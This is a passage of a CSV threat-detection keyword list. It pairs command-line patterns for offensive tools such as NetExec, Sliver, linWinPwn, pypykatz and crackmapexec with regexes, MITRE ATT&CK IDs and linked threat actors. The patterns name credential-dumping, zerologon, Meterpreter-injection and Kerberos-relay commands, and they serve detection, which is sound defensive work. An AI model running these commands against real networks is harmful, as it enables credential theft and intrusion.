Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3169" "* sliver-client_windows-amd64*.exe*",".{0,1000}\ssliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3170" "* sliver-client_windows-arm64*.exe*",".{0,1000}\ssliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3171" "* SmallSecretsDump.py*",".{0,1000}\sSmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","3172" "* --smartassembly-methodparentobfuscation *",".{0,1000}\s\-\-smartassembly\-methodparentobfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3173" "* --smartassembly-nameobfuscate *",".{0,1000}\s\-\-smartassembly\-nameobfuscate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3174" "* --smartassembly-typemethodobfuscation *",".{0,1000}\s\-\-smartassembly\-typemethodobfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3175" "* smb * --dpapi 
*password*",".{0,1000}\ssmb\s.{0,1000}\s\-\-dpapi\s.{0,1000}password.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3176" "* smb * --gen-relay-list *.txt*",".{0,1000}\ssmb\s.{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3177" "* smb * --lsa --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-lsa\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3178" "* smb * -M lsassy*",".{0,1000}\ssmb\s.{0,1000}\s\-M\slsassy.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3179" "* smb * -M masky -o CA=*",".{0,1000}\ssmb\s.{0,1000}\s\-M\smasky\s\-o\sCA\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3180" "* smb * -M msol *",".{0,1000}\ssmb\s.{0,1000}\s\-M\smsol\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3181" "* smb * -M ntlmv1 *",".{0,1000}\ssmb\s.{0,1000}\s\-M\sntlmv1\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3182" "* smb * -M rdp -o ACTION=enable*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srdp\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3183" "* smb * -M runasppl*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srunasppl.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3184" "* smb * -M security-questions*",".{0,1000}\ssmb\s.{0,1000}\s\-M\ssecurity\-questions.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3185" "* smb * -M zerologon*",".{0,1000}\ssmb\s.{0,1000}\s\-M\szerologon.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3186" "* smb * --ntds --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-ntds\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - 
TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3187" "* smb * --sam --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-sam\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3188" "* smb * --sccm wmi*",".{0,1000}\ssmb\s.{0,1000}\s\s\-\-sccm\swmi.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3189" "* smb * -u * -p * * -M dfscoerce*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sdfscoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3190" "* smb * -u * -p * * --rid-brute*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3191" "* smb * -u * -p * * --shares --filter-shares *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-shares\s\-\-filter\-shares\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3192" "* smb * -u * -p * * -X whoami --obfs*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3193" "* smb * -u * -p * -M enum_av*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_av.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3194" "* smb * -u * -p * -M enum_dns*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_dns.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3195" "* smb * -u * -p * -M gpp_password*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sgpp_password.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3196" "* smb * -u * -p * -M met_inject *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3197" "* smb * -u * -p * --wmi ""select Name from 
win32_computersystem""*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-wmi\s\""select\sName\sfrom\swin32_computersystem\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3198" "* smb client * shares *use c$*",".{0,1000}\ssmb\sclient\s.{0,1000}\sshares\s.{0,1000}use\sc\$.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","3199" "* smb -M mimikatz --options*",".{0,1000}\ssmb\s\-M\smimikatz\s\-\-options.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3200" "* smb shareenum *smb2+ntlm-password*",".{0,1000}\ssmb\sshareenum\s.{0,1000}smb2\+ntlm\-password.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","3201" "* -smb --smbkeyword * -victim *",".{0,1000}\s\-smb\s\-\-smbkeyword\s.{0,1000}\s\-victim\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3202" "* smb* -u '' -p ''*",".{0,1000}\ssmb.{0,1000}\s\-u\s\'\'\s\-p\s\'\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3203" "* smb_control.bat*",".{0,1000}\ssmb_control\.bat.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","3204" "* SMB_Staging.c*",".{0,1000}\sSMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","3205" "* smb2-capabilities.nse*",".{0,1000}\ssmb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3206" "* smb2-security-mode.nse*",".{0,1000}\ssmb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3207" "* -smb2support --interactive *",".{0,1000}\s\-smb2support\s\-\-interactive\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3208" "* smb2-time.nse*",".{0,1000}\ssmb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3209" "* smb2-vuln-uptime.nse*",".{0,1000}\ssmb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3210" "* smb-brute.nse*",".{0,1000}\ssmb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3211" "* smb-cmds.txt*",".{0,1000}\ssmb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","3212" "* smb-double-pulsar-backdoor.nse*",".{0,1000}\ssmb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3213" "* smb-enum-domains.nse*",".{0,1000}\ssmb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3214" "* smb-enum-groups.nse*",".{0,1000}\ssmb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3215" "* smb-enum-processes.nse*",".{0,1000}\ssmb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3216" "* smb-enum-services.nse*",".{0,1000}\ssmb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3217" "* smb-enum-sessions.nse*",".{0,1000}\ssmb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3218" "* smb-enum-shares.nse*",".{0,1000}\ssmb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3219" "* smb-enum-users.nse*",".{0,1000}\ssmb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
